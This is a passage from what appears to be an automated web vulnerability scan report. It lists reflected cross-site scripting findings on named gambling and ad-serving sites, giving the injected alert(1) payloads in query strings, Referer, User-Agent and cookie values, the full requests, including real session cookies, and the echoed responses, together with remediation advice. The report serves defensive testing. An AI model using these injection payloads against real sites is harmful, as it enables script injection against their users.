This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index.asp?curr=USD13cad"%3balert(1)//2102d64af9&g=3 HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 29898
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:44 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: pscref=; expires=Thu, 10-May-2012 12:34:44 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
document.trucksys.submit();
   DownloadCount();
}


function doflashSidebar_ByLng()
{
var flashGettingStarted = new FlashObject("http://www.primescratchcards.com/images/sidebar_flash/ENG_USD13cad";alert(1)//2102d64af9.swf", "movie", "197", "134", "6", "");
flashGettingStarted.addParam("quality", "best");
flashGettingStarted.addParam("allowScriptAccess", "always");
flashGettingStarted.addParam("wmode", "tra
...[SNIP]...

3.76. http://ad.yieldmanager.com/imp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45128'-alert(1)-'006f93246b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=728x90&s=1703625&_salt=78423076&B=12&m=2&r=0 HTTP/1.1
Host: ad.yieldmanager.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=45128'-alert(1)-'006f93246b
Cookie: BX=ek8k2sl67ofpa&b=4&s=o9&t=39; ih="b!!!!$!.`.U!!!!#<y'ux!2$8S!!!!#<y'ui"; bh="b!!!!m!!Zwa!!!!#=!DU4!!ry1!!!!#=!msQ!!uoE!!!!(=!>P_!##!O!!!!#=!DU4!#*.a!!!!#=!o!R!#*VS!!!!#=!o!R!#*Xc!!!!#=!07,!#0%H!!!!#=!msS!#1*0!!!!#=!DU4!#1*h!!!!#=!DU4!#3pS!!!!#=!gBG!#3pv!!!!#=!gBG!#5(U!!!!#=!o!R!#5(W!!!!#=!07,!#5(X!!!!#=!o!R!#5(Y!!!!#=!gBG!#5(_!!!!#=!07,!#5(a!!!!#=!gBG!#5(c!!!!#=!o!R!#5(f!!!!#=!o!R!#C)^!!!!#=!Vkm!#Ie7!!!!#=!dO*!#T?O!!!!#=!dO*!#VSs!!!!#=!o!R!#Zb$!!!!#=!DU4!#Zbt!!!!#=!DU4!#b9/!!!!#<uEax!#b<Z!!!!#=!07,!#b<d!!!!#=!o!R!#b<e!!!!#=!gBG!#b<g!!!!#=!gBG!#b<i!!!!#=!gBG!#b<m!!!!#=!07,!#b<p!!!!#=!07,!#b<s!!!!#=!085!#b<t!!!!#=!085!#b='!!!!#=!gBG!#b?f!!!!#=!msI!#dxJ!!!!#=!DU4!#dxO!!!!#=!DU4!#g:`!!!!#=!DU4!#g=D!!!!#=!DU4!#gar!!!!#=!DU4!#h.N!!!!%=!>qI!#ncR!!!!#=!DU4!#sDa!!!!#=!$y[!#s`9!!!!#=!$y[!#s`=!!!!#=!$yh!#s`?!!!!#=!$yh!#s`D!!!!#=!$y[!#sa7!!!!#=!%!=!#sa:!!!!#=!%!=!#saD!!!!#=!%!=!#sgK!!!!#=!$y[!#sgS!!!!#=!$y[!#sgU!!!!#=!$y[!#sgV!!!!#=!$yh!#vA$!!!!#=!DU4!#x??!!!!'=!nv,!#yGL!!!!#=!DU4!$#4B!!!!#=!DU4!$#4C!!!!#=!DU4!$#4E!!!!#=!DU4!$#?.!!!!#=!Vki!$'?p!!!!#=!$y[!$'AB!!!!#=!$y[!$'AP!!!!#=!$y[!$'AR!!!!#=!$y[!$'AU!!!!#=!$yh!$'AY!!!!#=!%!=!$'L<!!!!#=!$y[!$(Tb!!!!#=!/l7"; uid=uid=c08a423c-7b10-11e0-8d2f-7fbc75b135eb&_hmacv=1&_salt=419862129&_keyid=k1&_hmac=80f2e481993e14f9e9c2e53c8bcda8051c813d3e

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:52:34 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0243.rm.bf1
Set-Cookie: ih="b!!!!%!.`.U!!!!#<y'ux!2$8S!!!!#<y'ui!2'V=!!!!#=!o!t"; path=/; expires=Wed, 15-May-2013 12:52:34 GMT
Set-Cookie: vuday1=JOU8[NDf0(/hP#[; path=/; expires=Tue, 17-May-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!#!$(#H!#yJY!$fh[!2'V=!%hKg!!!!$!?5%!$Tey-!wVd.!'Hct!$gSu!'x'(~~~~~=!o!t=(*f'!!.vL"; path=/; expires=Wed, 15-May-2013 12:52:34 GMT
Set-Cookie: BX=ek8k2sl67ofpa&b=4&s=o9&t=39; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: lifb=OrgU(-xY.<O0,nW; path=/; expires=Mon, 16-May-2011 13:52:34 GMT
Cache-Control: no-store
Last-Modified: Mon, 16 May 2011 12:52:34 GMT
Pragma: no-cache
Content-Length: 3662
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

//raw JavaScript
document.write('<scr'+'ipt>\nvar gEbBAd = new Object();\ngEbBAd.AClickUrl = "http://t.mookie1.com/t/v1/clk?migAgencyId=66&migSource=mmind&migTrackDataExt=[%tp_AdID%];[%tp_Placement
...[SNIP]...
asci_publiid = '1709175';
var asci_sectid = '1703625';
var asci_advliid = '3056520';
var asci_cid = '9245050';
var asci_p = '200';
var asci_refurl = escape('http://www.google.com/search?hl=en&q=45128'-alert(1)-'006f93246b');
if ( asci_refurl.length >
...[SNIP]...

3.77. https://www.interwetten.com/sportsbook/registrationform.aspx [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /sportsbook/registrationform.aspx

Issue detail

The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa0eb"><script>alert(1)</script>69648c939d3 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sportsbook/registrationform.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fa0eb"><script>alert(1)</script>69648c939d3
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:45:46 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:45:46 GMT
Content-Length: 199712
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head
...[SNIP]...
wWindow = window.open('https://service.velaro.com/visitor/requestchat.aspx?showwhen=inqueue&secure=yes&Name:=&Email:=&siteid=7297&deptid=12265&Browser=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fa0eb"><script>alert(1)</script>69648c939d3'+getFormValues(), 'OnlineChatSoftware', 'toolbar=no,location=no,directories=no,menubar=no,status=no,scrollbars=no,resizable=yes,replace=no');this.newWindow.focus();this.newWindow.opener=window;return
...[SNIP]...

3.78. http://home.okscratchcards.com/AboutUs.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /AboutUs.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c00d9"-alert(1)-"58ee19908e3 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AboutUs.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMc00d9"-alert(1)-"58ee19908e3; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:54 GMT; path=/
Set-Cookie: BO=FMc00d9"-alert(1)-"58ee19908e3; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:54 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:54 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:54 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:54 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36955


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMc00d9"-alert(1)-"58ee19908e3";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.79. http://home.okscratchcards.com/AboutUs.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /AboutUs.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcd02"-alert(1)-"7f6a71d7a39 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AboutUs.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PMdcd02"-alert(1)-"7f6a71d7a39; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:16:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMdcd02"-alert(1)-"7f6a71d7a39; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:40 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:40 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:40 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:40 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:40 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36955


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMdcd02"-alert(1)-"7f6a71d7a39";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.80. http://home.okscratchcards.com/ContactUsMail.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /ContactUsMail.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6100"-alert(1)-"98a251159eb was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMb6100"-alert(1)-"98a251159eb; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: BO=FMb6100"-alert(1)-"98a251159eb; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42312


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMb6100"-alert(1)-"98a251159eb";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.81. http://home.okscratchcards.com/ContactUsMail.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /ContactUsMail.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ced5"-alert(1)-"413d8871f9d was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM8ced5"-alert(1)-"413d8871f9d; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM8ced5"-alert(1)-"413d8871f9d; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:22 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:22 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:22 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:22 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:22 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42312


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM8ced5"-alert(1)-"413d8871f9d";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.82. http://home.okscratchcards.com/FairPlay.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /FairPlay.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5d81"-alert(1)-"17298092768 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FairPlay.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMe5d81"-alert(1)-"17298092768; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:52 GMT; path=/
Set-Cookie: BO=FMe5d81"-alert(1)-"17298092768; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:52 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:52 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:52 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:52 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36175


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMe5d81"-alert(1)-"17298092768";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.83. http://home.okscratchcards.com/FairPlay.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /FairPlay.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce8fc"-alert(1)-"38f2ab8268e was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FairPlay.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PMce8fc"-alert(1)-"38f2ab8268e; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMce8fc"-alert(1)-"38f2ab8268e; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:41 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:41 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:41 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:41 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:41 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36175


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
